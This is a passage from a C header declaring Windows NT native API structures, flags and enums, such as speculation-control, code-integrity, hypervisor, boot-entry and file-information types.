PSYSTEM_VSM_PROTECTION_INFORMATION;\n\n//msdn.microsoft.com/en-us/library/windows/desktop/ms724509(v=vs.85).aspx\ntypedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION {\n    union {\n        ULONG Flags;\n        struct {\n            ULONG BpbEnabled : 1;\n            ULONG BpbDisabledSystemPolicy : 1;\n            ULONG BpbDisabledNoHardwareSupport : 1;\n            ULONG SpecCtrlEnumerated : 1;\n            ULONG SpecCmdEnumerated : 1;\n            ULONG IbrsPresent : 1;\n            ULONG StibpPresent : 1;\n            ULONG SmepPresent : 1;\n            ULONG SpeculativeStoreBypassDisableAvailable : 1;\n            ULONG SpeculativeStoreBypassDisableSupported : 1;\n            ULONG SpeculativeStoreBypassDisabledSystemWide : 1;\n            ULONG SpeculativeStoreBypassDisabledKernel : 1;\n            ULONG SpeculativeStoreBypassDisableRequired : 1;\n            ULONG BpbDisabledKernelToUser : 1;\n            ULONG SpecCtrlRetpolineEnabled : 1;\n            ULONG SpecCtrlImportOptimizationEnabled : 1;\n            ULONG EnhancedIbrs : 1;\n            ULONG HvL1tfStatusAvailable : 1;\n            ULONG HvL1tfProcessorNotAffected : 1;\n            ULONG HvL1tfMigitationEnabled : 1;\n            ULONG HvL1tfMigitationNotEnabled_Hardware : 1;\n            ULONG HvL1tfMigitationNotEnabled_LoadOption : 1;\n            ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1;\n            ULONG EnhancedIbrsReported : 1;\n            ULONG MdsHardwareProtected : 1;\n            ULONG MbClearEnabled : 1;\n            ULONG MbClearReported : 1;\n            ULONG TsxCtrlStatus : 2;\n            ULONG TsxCtrlReported : 1;\n            ULONG TaaHardwareImmune : 1;\n            ULONG Reserved : 1;\n        } SpeculationControlFlags;\n    };\n} SYSTEM_SPECULATION_CONTROL_INFORMATION, *PSYSTEM_SPECULATION_CONTROL_INFORMATION;\n\ntypedef struct _SYSTEM_SPECULATION_CONTROL_INFORMATION_V2 {\n    union {\n        ULONG Flags;\n        struct {\n            ULONG BpbEnabled : 1;\n     
       ULONG BpbDisabledSystemPolicy : 1;\n            ULONG BpbDisabledNoHardwareSupport : 1;\n            ULONG SpecCtrlEnumerated : 1;\n            ULONG SpecCmdEnumerated : 1;\n            ULONG IbrsPresent : 1;\n            ULONG StibpPresent : 1;\n            ULONG SmepPresent : 1;\n            ULONG SpeculativeStoreBypassDisableAvailable : 1;\n            ULONG SpeculativeStoreBypassDisableSupported : 1;\n            ULONG SpeculativeStoreBypassDisabledSystemWide : 1;\n            ULONG SpeculativeStoreBypassDisabledKernel : 1;\n            ULONG SpeculativeStoreBypassDisableRequired : 1;\n            ULONG BpbDisabledKernelToUser : 1;\n            ULONG SpecCtrlRetpolineEnabled : 1;\n            ULONG SpecCtrlImportOptimizationEnabled : 1;\n            ULONG EnhancedIbrs : 1;\n            ULONG HvL1tfStatusAvailable : 1;\n            ULONG HvL1tfProcessorNotAffected : 1;\n            ULONG HvL1tfMigitationEnabled : 1;\n            ULONG HvL1tfMigitationNotEnabled_Hardware : 1;\n            ULONG HvL1tfMigitationNotEnabled_LoadOption : 1;\n            ULONG HvL1tfMigitationNotEnabled_CoreScheduler : 1;\n            ULONG EnhancedIbrsReported : 1;\n            ULONG MdsHardwareProtected : 1;\n            ULONG MbClearEnabled : 1;\n            ULONG MbClearReported : 1;\n            ULONG TsxCtrlStatus : 2;\n            ULONG TsxCtrlReported : 1;\n            ULONG TaaHardwareImmune : 1;\n            ULONG Reserved : 1;\n        } SpeculationControlFlags;\n    };\n    union {\n        ULONG Flags2;\n        struct {\n            ULONG SbdrSsdpHardwareProtected : 1;\n            ULONG FbsdpHardwareProtected : 1;\n            ULONG PsdpHardwareProtected : 1;\n            ULONG FbClearEnabled : 1;\n            ULONG FbClearReported : 1;\n            ULONG BhbEnabled : 1;\n            ULONG BhbDisabledSystemPolicy : 1;\n            ULONG BhbDisabledNoHardwareSupport : 1;\n            ULONG BranchConfusionStatus : 2;\n            ULONG BranchConfusionReported : 
1;\n            ULONG RdclHardwareProtectedReported : 1;\n            ULONG RdclHardwareProtected : 1;\n            ULONG Reserved3 : 4;\n            ULONG Reserved4 : 3;\n            ULONG DivideByZeroReported : 1;\n            ULONG DivideByZeroStatus : 1;\n            ULONG Reserved5 : 3;\n            ULONG Reserved : 7;\n        } SpeculationControlFlags2;\n    };\n} SYSTEM_SPECULATION_CONTROL_INFORMATION_V2, * PSYSTEM_SPECULATION_CONTROL_INFORMATION_V2;\n\n// Kernel VA shadow (KVAS) state, returned for SystemKernelVaShadowInformation.\ntypedef struct _SYSTEM_KERNEL_VA_SHADOW_INFORMATION {\n    union {\n        ULONG Flags;\n        struct {\n            ULONG KvaShadowEnabled : 1;\n            ULONG KvaShadowUserGlobal : 1;\n            ULONG KvaShadowPcid : 1;\n            ULONG KvaShadowInvpcid : 1;\n            ULONG KvaShadowRequired : 1;\n            ULONG KvaShadowRequiredAvailable : 1;\n            ULONG InvalidPteBit : 6;\n            ULONG L1DataCacheFlushSupported : 1;\n            ULONG L1TerminalFaultMitigationPresent : 1;\n            ULONG Reserved : 18;\n        } KvaShadowFlags;\n    };\n} SYSTEM_KERNEL_VA_SHADOW_INFORMATION, *PSYSTEM_KERNEL_VA_SHADOW_INFORMATION;\n\n// Returned for SystemCodeIntegrityInformation; the caller sets Length to\n// sizeof(SYSTEM_CODEINTEGRITY_INFORMATION) before the query.\ntypedef struct _SYSTEM_CODEINTEGRITY_INFORMATION {\n    ULONG  Length;\n    ULONG  CodeIntegrityOptions;\n} SYSTEM_CODEINTEGRITY_INFORMATION, *PSYSTEM_CODEINTEGRITY_INFORMATION;\n\n// Bit flags reported in SYSTEM_CODEINTEGRITY_INFORMATION.CodeIntegrityOptions.\n#define CODEINTEGRITY_OPTION_ENABLED                      0x01\n#define CODEINTEGRITY_OPTION_TESTSIGN                     0x02\n#define CODEINTEGRITY_OPTION_UMCI_ENABLED                 0x04\n#define CODEINTEGRITY_OPTION_UMCI_AUDITMODE_ENABLED       0x08\n#define CODEINTEGRITY_OPTION_UMCI_EXCLUSIONPATHS_ENABLED  0x10\n#define CODEINTEGRITY_OPTION_TEST_BUILD                   0x20\n#define CODEINTEGRITY_OPTION_PREPRODUCTION_BUILD          0x40\n#define CODEINTEGRITY_OPTION_DEBUGMODE_ENABLED            0x80\n#define CODEINTEGRITY_OPTION_FLIGHT_BUILD                 0x100\n#define CODEINTEGRITY_OPTION_FLIGHTING_ENABLED            0x200\n#define CODEINTEGRITY_OPTION_HVCI_KMCI_ENABLED     
       0x400\n#define CODEINTEGRITY_OPTION_HVCI_KMCI_AUDITMODE_ENABLED  0x800\n#define CODEINTEGRITY_OPTION_HVCI_KMCI_STRICTMODE_ENABLED 0x1000\n#define CODEINTEGRITY_OPTION_HVCI_IUM_ENABLED             0x2000\n#define CODEINTEGRITY_OPTION_WHQL_ENFORCEMENT_ENABLED     0x4000\n#define CODEINTEGRITY_OPTION_WHQL_AUDITMODE_ENABLED       0x8000\n\ntypedef struct _HV_DETAILS {\n    ULONG Data[4];\n} HV_DETAILS, * PHV_DETAILS;\n\ntypedef struct _HV_VENDOR_AND_MAX_FUNCTION {\n    ULONG MaxFunction;\n    CHAR VendorName[12];\n} HV_VENDOR_AND_MAX_FUNCTION, * PHV_VENDOR_AND_MAX_FUNCTION;\n\ntypedef struct _SYSTEM_HYPERVISOR_DETAIL_INFORMATION {\n    HV_DETAILS HvVendorAndMaxFunction;\n    HV_DETAILS HypervisorInterface;\n    HV_DETAILS HypervisorVersion;\n    HV_DETAILS HvFeatures;\n    HV_DETAILS HwFeatures;\n    HV_DETAILS EnlightenmentInfo;\n    HV_DETAILS ImplementationLimits;\n} SYSTEM_HYPERVISOR_DETAIL_INFORMATION, * PSYSTEM_HYPERVISOR_DETAIL_INFORMATION;\n\ntypedef struct _SYSTEM_HYPERVISOR_QUERY_INFORMATION {\n    BOOLEAN HypervisorConnected;\n    BOOLEAN HypervisorDebuggingEnabled;\n    BOOLEAN HypervisorPresent;\n    BOOLEAN Spare0[5];\n    ULONGLONG EnabledEnlightenments;\n} SYSTEM_HYPERVISOR_QUERY_INFORMATION, * PSYSTEM_HYPERVISOR_QUERY_INFORMATION;\n\ntypedef VOID(NTAPI *PIO_APC_ROUTINE)(\n    _In_ PVOID ApcContext,\n    _In_ PIO_STATUS_BLOCK IoStatusBlock,\n    _In_ ULONG Reserved\n    );\n\n// Expands to a bare brace block, not do { } while (0): put the call inside\n// braces when it is the body of an if that has an else.\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\n    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \\\n    (p)->RootDirectory = r;                             \\\n    (p)->Attributes = a;                                \\\n    (p)->ObjectName = n;                                \\\n    (p)->SecurityDescriptor = s;                        \\\n    (p)->SecurityQualityOfService = NULL;               \\\n    }\n\ntypedef struct _SYSTEM_VHD_BOOT_INFORMATION {\n    BOOLEAN OsDiskIsVhd;\n    ULONG OsVhdFilePathOffset;\n    WCHAR OsVhdParentVolume[ANYSIZE_ARRAY];\n} 
SYSTEM_VHD_BOOT_INFORMATION, *PSYSTEM_VHD_BOOT_INFORMATION;\n\ntypedef struct _SYSTEM_OBJECTTYPE_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG NumberOfObjects;\n    ULONG NumberOfHandles;\n    ULONG TypeIndex;\n    ULONG InvalidAttributes;\n    GENERIC_MAPPING GenericMapping;\n    ULONG ValidAccessMask;\n    ULONG PoolType;\n    BOOLEAN SecurityRequired;\n    BOOLEAN WaitableObject;\n    UNICODE_STRING TypeName;\n} SYSTEM_OBJECTTYPE_INFORMATION, *PSYSTEM_OBJECTTYPE_INFORMATION;\n\ntypedef struct _SYSTEM_OBJECT_INFORMATION {\n    ULONG NextEntryOffset;\n    PVOID Object;\n    HANDLE CreatorUniqueProcess;\n    USHORT CreatorBackTraceIndex;\n    USHORT Flags;\n    LONG PointerCount;\n    LONG HandleCount;\n    ULONG PagedPoolCharge;\n    ULONG NonPagedPoolCharge;\n    HANDLE ExclusiveProcessId;\n    PVOID SecurityDescriptor;\n    UNICODE_STRING NameInfo;\n} SYSTEM_OBJECT_INFORMATION, *PSYSTEM_OBJECT_INFORMATION;\n\n/*\n** Boot Entry START\n*/\n\ntypedef struct _FILE_PATH {\n    ULONG Version;\n    ULONG Length;\n    ULONG Type;\n    UCHAR FilePath[ANYSIZE_ARRAY];\n} FILE_PATH, *PFILE_PATH;\n\ntypedef struct _BOOT_ENTRY {\n    ULONG Version;\n    ULONG Length;\n    ULONG Id;\n    ULONG Attributes;\n    ULONG FriendlyNameOffset;\n    ULONG BootFilePathOffset;\n    ULONG OsOptionsLength;\n    UCHAR OsOptions[ANYSIZE_ARRAY];\n} BOOT_ENTRY, *PBOOT_ENTRY;\n\ntypedef struct _BOOT_ENTRY_LIST {\n    ULONG NextEntryOffset;\n    BOOT_ENTRY BootEntry;\n} BOOT_ENTRY_LIST, *PBOOT_ENTRY_LIST;\n\n/*\n** Boot Entry END\n*/\n\n/*\n** File start\n*/\n\n#define FILE_SUPERSEDE                          0x00000000\n#define FILE_OPEN                               0x00000001\n#define FILE_CREATE                             0x00000002\n#define FILE_OPEN_IF                            0x00000003\n#define FILE_OVERWRITE                          0x00000004\n#define FILE_OVERWRITE_IF                       0x00000005\n#define FILE_MAXIMUM_DISPOSITION                0x00000005\n\n#define 
FILE_DIRECTORY_FILE                     0x00000001\n#define FILE_WRITE_THROUGH                      0x00000002\n#define FILE_SEQUENTIAL_ONLY                    0x00000004\n#define FILE_NO_INTERMEDIATE_BUFFERING          0x00000008\n\n#define FILE_SYNCHRONOUS_IO_ALERT               0x00000010\n#define FILE_SYNCHRONOUS_IO_NONALERT            0x00000020\n#define FILE_NON_DIRECTORY_FILE                 0x00000040\n#define FILE_CREATE_TREE_CONNECTION             0x00000080\n\n#define FILE_COMPLETE_IF_OPLOCKED               0x00000100\n#define FILE_NO_EA_KNOWLEDGE                    0x00000200\n#define FILE_OPEN_FOR_RECOVERY                  0x00000400\n#define FILE_RANDOM_ACCESS                      0x00000800\n\n#define FILE_DELETE_ON_CLOSE                    0x00001000\n#define FILE_OPEN_BY_FILE_ID                    0x00002000\n#define FILE_OPEN_FOR_BACKUP_INTENT             0x00004000\n#define FILE_NO_COMPRESSION                     0x00008000\n\n#define FILE_RESERVE_OPFILTER                   0x00100000\n#define FILE_OPEN_REPARSE_POINT                 0x00200000\n#define FILE_OPEN_NO_RECALL                     0x00400000\n#define FILE_OPEN_FOR_FREE_SPACE_QUERY          0x00800000\n\n\n#define FILE_COPY_STRUCTURED_STORAGE            0x00000041\n#define FILE_STRUCTURED_STORAGE                 0x00000441\n\n#define FILE_VALID_OPTION_FLAGS                 0x00ffffff\n#define FILE_VALID_PIPE_OPTION_FLAGS            0x00000032\n#define FILE_VALID_MAILSLOT_OPTION_FLAGS        0x00000032\n#define FILE_VALID_SET_FLAGS                    0x00000036\n\ntypedef enum _FILE_INFORMATION_CLASS {\n    FileDirectoryInformation = 1,\n    FileFullDirectoryInformation,\n    FileBothDirectoryInformation,\n    FileBasicInformation,\n    FileStandardInformation,\n    FileInternalInformation,\n    FileEaInformation,\n    FileAccessInformation,\n    FileNameInformation,\n    FileRenameInformation,\n    FileLinkInformation,\n    FileNamesInformation,\n    FileDispositionInformation,\n    
FilePositionInformation,\n    FileFullEaInformation,\n    FileModeInformation,\n    FileAlignmentInformation,\n    FileAllInformation,\n    FileAllocationInformation,\n    FileEndOfFileInformation,\n    FileAlternateNameInformation,\n    FileStreamInformation,\n    FilePipeInformation,\n    FilePipeLocalInformation,\n    FilePipeRemoteInformation,\n    FileMailslotQueryInformation,\n    FileMailslotSetInformation,\n    FileCompressionInformation,\n    FileObjectIdInformation,\n    FileCompletionInformation,\n    FileMoveClusterInformation,\n    FileQuotaInformation,\n    FileReparsePointInformation,\n    FileNetworkOpenInformation,\n    FileAttributeTagInformation,\n    FileTrackingInformation,\n    FileIdBothDirectoryInformation,\n    FileIdFullDirectoryInformation,\n    FileValidDataLengthInformation,\n    FileShortNameInformation,\n    FileIoCompletionNotificationInformation,\n    FileIoStatusBlockRangeInformation,\n    FileIoPriorityHintInformation,\n    FileSfioReserveInformation,\n    FileSfioVolumeInformation,\n    FileHardLinkInformation,\n    FileProcessIdsUsingFileInformation,\n    FileNormalizedNameInformation,\n    FileNetworkPhysicalNameInformation,\n    FileIdGlobalTxDirectoryInformation,\n    FileIsRemoteDeviceInformation,\n    FileUnusedInformation,\n    FileNumaNodeInformation,\n    FileStandardLinkInformation,\n    FileRemoteProtocolInformation,\n    FileRenameInformationBypassAccessCheck,\n    FileLinkInformationBypassAccessCheck,\n    FileVolumeNameInformation,\n    FileIdInformation,\n    FileIdExtdDirectoryInformation,\n    FileReplaceCompletionInformation,\n    FileHardLinkFullIdInformation,\n    FileIdExtdBothDirectoryInformation,\n    FileDispositionInformationEx,\n    FileRenameInformationEx,\n    FileRenameInformationExBypassAccessCheck,\n    FileDesiredStorageClassInformation,\n    FileStatInformation,\n    FileMemoryPartitionInformation,\n    FileStatLxInformation,\n    FileCaseSensitiveInformation,\n    FileLinkInformationEx,\n    
FileLinkInformationExBypassAccessCheck,\n    FileStorageReserveIdInformation,\n    FileCaseSensitiveInformationForceAccessCheck,\n    FileKnownFolderInformation,\n    FileStatBasicInformation,\n    FileId64ExtdDirectoryInformation,\n    FileId64ExtdBothDirectoryInformation,\n    FileIdAllExtdDirectoryInformation,\n    FileIdAllExtdBothDirectoryInformation,\n    FileStreamReservationInformation,\n    FileMaximumInformation\n} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;\n\ntypedef enum _FSINFOCLASS {\n    FileFsVolumeInformation = 1,\n    FileFsLabelInformation,\n    FileFsSizeInformation,\n    FileFsDeviceInformation,\n    FileFsAttributeInformation,\n    FileFsControlInformation,\n    FileFsFullSizeInformation,\n    FileFsObjectIdInformation,\n    FileFsDriverPathInformation,\n    FileFsVolumeFlagsInformation,\n    FileFsSectorSizeInformation,\n    FileFsDataCopyInformation,\n    FileFsMetadataSizeInformation,\n    FileFsFullSizeInformationEx,\n    FileFsGuidInformation,\n    FileFsMaximumInformation\n} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS;\n\ntypedef struct _FILE_BASIC_INFORMATION {\n    LARGE_INTEGER CreationTime;\n    LARGE_INTEGER LastAccessTime;\n    LARGE_INTEGER LastWriteTime;\n    LARGE_INTEGER ChangeTime;\n    ULONG FileAttributes;\n} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION;\n\ntypedef struct _FILE_STANDARD_INFORMATION {\n    LARGE_INTEGER AllocationSize;\n    LARGE_INTEGER EndOfFile;\n    ULONG NumberOfLinks;\n    UCHAR DeletePending;\n    UCHAR Directory;\n} FILE_STANDARD_INFORMATION;\n\ntypedef struct _FILE_STANDARD_INFORMATION_EX {\n    LARGE_INTEGER AllocationSize;\n    LARGE_INTEGER EndOfFile;\n    ULONG NumberOfLinks;\n    BOOLEAN DeletePending;\n    BOOLEAN Directory;\n    BOOLEAN AlternateStream;\n    BOOLEAN MetadataAttribute;\n} FILE_STANDARD_INFORMATION_EX, *PFILE_STANDARD_INFORMATION_EX;\n\ntypedef struct _FILE_INTERNAL_INFORMATION {\n    LARGE_INTEGER IndexNumber;\n} FILE_INTERNAL_INFORMATION, 
*PFILE_INTERNAL_INFORMATION;\n\ntypedef struct _FILE_EA_INFORMATION {\n    ULONG EaSize;\n} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;\n\ntypedef struct _FILE_ACCESS_INFORMATION {\n    ACCESS_MASK AccessFlags;\n} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;\n\ntypedef struct _FILE_POSITION_INFORMATION {\n    LARGE_INTEGER CurrentByteOffset;\n} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION;\n\ntypedef struct _FILE_MODE_INFORMATION {\n    ULONG Mode;\n} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;\n\ntypedef struct _FILE_ALIGNMENT_INFORMATION {\n    ULONG AlignmentRequirement;\n} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION;\n\ntypedef struct _FILE_NAME_INFORMATION {\n    ULONG FileNameLength;\n    WCHAR FileName[1];\n} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION;\n\ntypedef struct _FILE_ALL_INFORMATION {\n    FILE_BASIC_INFORMATION BasicInformation;\n    FILE_STANDARD_INFORMATION StandardInformation;\n    FILE_INTERNAL_INFORMATION InternalInformation;\n    FILE_EA_INFORMATION EaInformation;\n    FILE_ACCESS_INFORMATION AccessInformation;\n    FILE_POSITION_INFORMATION PositionInformation;\n    FILE_MODE_INFORMATION ModeInformation;\n    FILE_ALIGNMENT_INFORMATION AlignmentInformation;\n    FILE_NAME_INFORMATION NameInformation;\n} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;\n\ntypedef struct _FILE_NETWORK_OPEN_INFORMATION {\n    LARGE_INTEGER CreationTime;\n    LARGE_INTEGER LastAccessTime;\n    LARGE_INTEGER LastWriteTime;\n    LARGE_INTEGER ChangeTime;\n    LARGE_INTEGER AllocationSize;\n    LARGE_INTEGER EndOfFile;\n    ULONG FileAttributes;\n} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;\n\ntypedef struct _FILE_ATTRIBUTE_TAG_INFORMATION {\n    ULONG FileAttributes;\n    ULONG ReparseTag;\n} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION;\n\ntypedef struct _FILE_ALLOCATION_INFORMATION {\n    LARGE_INTEGER AllocationSize;\n} FILE_ALLOCATION_INFORMATION, 
*PFILE_ALLOCATION_INFORMATION;\n\ntypedef struct _FILE_COMPRESSION_INFORMATION {\n    LARGE_INTEGER CompressedFileSize;\n    USHORT CompressionFormat;\n    UCHAR CompressionUnitShift;\n    UCHAR ChunkShift;\n    UCHAR ClusterShift;\n    UCHAR Reserved[3];\n} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION;\n\ntypedef struct _FILE_DISPOSITION_INFORMATION {\n    BOOLEAN DeleteFile;\n} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION;\n\ntypedef struct _FILE_END_OF_FILE_INFORMATION {\n    LARGE_INTEGER EndOfFile;\n} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION;\n\ntypedef struct _FILE_VALID_DATA_LENGTH_INFORMATION {\n    LARGE_INTEGER ValidDataLength;\n} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION;\n\ntypedef struct _FILE_LINK_INFORMATION {\n    BOOLEAN ReplaceIfExists;\n    HANDLE RootDirectory;\n    ULONG FileNameLength;\n    WCHAR FileName[1];\n} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;\n\ntypedef struct _FILE_MOVE_CLUSTER_INFORMATION {\n    ULONG ClusterCount;\n    HANDLE RootDirectory;\n    ULONG FileNameLength;\n    WCHAR FileName[1];\n} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION;\n\ntypedef struct _FILE_RENAME_INFORMATION {\n    BOOLEAN ReplaceIfExists;\n    HANDLE RootDirectory;\n    ULONG FileNameLength;\n    WCHAR FileName[1];\n} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;\n\ntypedef struct _FILE_STREAM_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG StreamNameLength;\n    LARGE_INTEGER StreamSize;\n    LARGE_INTEGER StreamAllocationSize;\n    WCHAR StreamName[1];\n} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;\n\ntypedef struct _FILE_TRACKING_INFORMATION {\n    HANDLE DestinationFile;\n    ULONG ObjectInformationLength;\n    CHAR ObjectInformation[1];\n} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION;\n\ntypedef struct _FILE_COMPLETION_INFORMATION {\n    HANDLE Port;\n    PVOID Key;\n} FILE_COMPLETION_INFORMATION, 
*PFILE_COMPLETION_INFORMATION;\n\n//\n// Define the NamedPipeType flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_BYTE_STREAM_TYPE      0x00000000\n#define FILE_PIPE_MESSAGE_TYPE          0x00000001\n\n//\n// Define the CompletionMode flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_QUEUE_OPERATION       0x00000000\n#define FILE_PIPE_COMPLETE_OPERATION    0x00000001\n\n//\n// Define the ReadMode flags for NtCreateNamedPipeFile\n//\n\n#define FILE_PIPE_BYTE_STREAM_MODE      0x00000000\n#define FILE_PIPE_MESSAGE_MODE          0x00000001\n\n//\n// Define the NamedPipeConfiguration flags for NtQueryInformation\n//\n\n#define FILE_PIPE_INBOUND               0x00000000\n#define FILE_PIPE_OUTBOUND              0x00000001\n#define FILE_PIPE_FULL_DUPLEX           0x00000002\n\n//\n// Define the NamedPipeState flags for NtQueryInformation\n//\n\n#define FILE_PIPE_DISCONNECTED_STATE    0x00000001\n#define FILE_PIPE_LISTENING_STATE       0x00000002\n#define FILE_PIPE_CONNECTED_STATE       0x00000003\n#define FILE_PIPE_CLOSING_STATE         0x00000004\n\n//\n// Define the NamedPipeEnd flags for NtQueryInformation\n//\n\n#define FILE_PIPE_CLIENT_END            0x00000000\n#define FILE_PIPE_SERVER_END            0x00000001\n\n\ntypedef struct _FILE_PIPE_INFORMATION {\n    ULONG ReadMode;\n    ULONG CompletionMode;\n} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION;\n\ntypedef struct _FILE_PIPE_LOCAL_INFORMATION {\n    ULONG NamedPipeType;\n    ULONG NamedPipeConfiguration;\n    ULONG MaximumInstances;\n    ULONG CurrentInstances;\n    ULONG InboundQuota;\n    ULONG ReadDataAvailable;\n    ULONG OutboundQuota;\n    ULONG WriteQuotaAvailable;\n    ULONG NamedPipeState;\n    ULONG NamedPipeEnd;\n} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION;\n\ntypedef struct _FILE_PIPE_REMOTE_INFORMATION {\n    LARGE_INTEGER CollectDataTime;\n    ULONG MaximumCollectionCount;\n} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION;\n\ntypedef struct 
_FILE_MAILSLOT_QUERY_INFORMATION {\n    ULONG MaximumMessageSize;\n    ULONG MailslotQuota;\n    ULONG NextMessageSize;\n    ULONG MessagesAvailable;\n    LARGE_INTEGER ReadTimeout;\n} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION;\n\ntypedef struct _FILE_MAILSLOT_SET_INFORMATION {\n    PLARGE_INTEGER ReadTimeout;\n} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION;\n\ntypedef struct _FILE_REPARSE_POINT_INFORMATION {\n    LONGLONG FileReference;\n    ULONG Tag;\n} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;\n\ntypedef struct _FILE_LINK_ENTRY_INFORMATION {\n    ULONG NextEntryOffset;\n    LONGLONG ParentFileId;\n    ULONG FileNameLength;\n    WCHAR FileName[1];\n} FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION;\n\ntypedef struct _FILE_LINKS_INFORMATION {\n    ULONG BytesNeeded;\n    ULONG EntriesReturned;\n    FILE_LINK_ENTRY_INFORMATION Entry;\n} FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION;\n\ntypedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {\n    ULONG FileNameLength;\n    WCHAR FileName[1];\n} FILE_NETWORK_PHYSICAL_NAME_INFORMATION, *PFILE_NETWORK_PHYSICAL_NAME_INFORMATION;\n\ntypedef struct _FILE_STANDARD_LINK_INFORMATION {\n    ULONG NumberOfAccessibleLinks;\n    ULONG TotalNumberOfLinks;\n    BOOLEAN DeletePending;\n    BOOLEAN Directory;\n} FILE_STANDARD_LINK_INFORMATION, *PFILE_STANDARD_LINK_INFORMATION;\n\ntypedef struct _FILE_SFIO_RESERVE_INFORMATION {\n    ULONG RequestsPerPeriod;\n    ULONG Period;\n    BOOLEAN RetryFailures;\n    BOOLEAN Discardable;\n    ULONG RequestSize;\n    ULONG NumOutstandingRequests;\n} FILE_SFIO_RESERVE_INFORMATION, *PFILE_SFIO_RESERVE_INFORMATION;\n\ntypedef struct _FILE_SFIO_VOLUME_INFORMATION {\n    ULONG MaximumRequestsPerPeriod;\n    ULONG MinimumPeriod;\n    ULONG MinimumTransferSize;\n} FILE_SFIO_VOLUME_INFORMATION, *PFILE_SFIO_VOLUME_INFORMATION;\n\n//\n// Define the flags for NtSet(Query)EaFile service structure entries\n//\n\n#define 
FILE_NEED_EA                    0x00000080\n\n//\n// Define EA type values\n//\n\n#define FILE_EA_TYPE_BINARY             0xfffe\n#define FILE_EA_TYPE_ASCII              0xfffd\n#define FILE_EA_TYPE_BITMAP             0xfffb\n#define FILE_EA_TYPE_METAFILE           0xfffa\n#define FILE_EA_TYPE_ICON               0xfff9\n#define FILE_EA_TYPE_EA                 0xffee\n#define FILE_EA_TYPE_MVMT               0xffdf\n#define FILE_EA_TYPE_MVST               0xffde\n#define FILE_EA_TYPE_ASN1               0xffdd\n#define FILE_EA_TYPE_FAMILY_IDS         0xff01\n\ntypedef struct _FILE_FULL_EA_INFORMATION {\n    ULONG NextEntryOffset;\n    UCHAR Flags;\n    UCHAR EaNameLength;\n    USHORT EaValueLength;\n    CHAR EaName[1];\n} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;\n\ntypedef struct _FILE_GET_EA_INFORMATION {\n    ULONG NextEntryOffset;\n    UCHAR EaNameLength;\n    CHAR EaName[1];\n} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;\n\ntypedef struct _FILE_GET_QUOTA_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG SidLength;\n    SID Sid;\n} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION;\n\ntypedef struct _FILE_QUOTA_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG SidLength;\n    LARGE_INTEGER ChangeTime;\n    LARGE_INTEGER QuotaUsed;\n    LARGE_INTEGER QuotaThreshold;\n    LARGE_INTEGER QuotaLimit;\n    SID Sid;\n} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION;\n\ntypedef struct _FILE_DIRECTORY_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG FileIndex;\n    LARGE_INTEGER CreationTime;\n    LARGE_INTEGER LastAccessTime;\n    LARGE_INTEGER LastWriteTime;\n    LARGE_INTEGER ChangeTime;\n    LARGE_INTEGER EndOfFile;\n    LARGE_INTEGER AllocationSize;\n    ULONG FileAttributes;\n    ULONG FileNameLength;\n    WCHAR FileName[1];\n} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;\n\ntypedef struct _FILE_FULL_DIR_INFORMATION {\n    ULONG NextEntryOffset;\n    ULONG FileIndex;\n    LARGE_INTEGER CreationTime;\n    
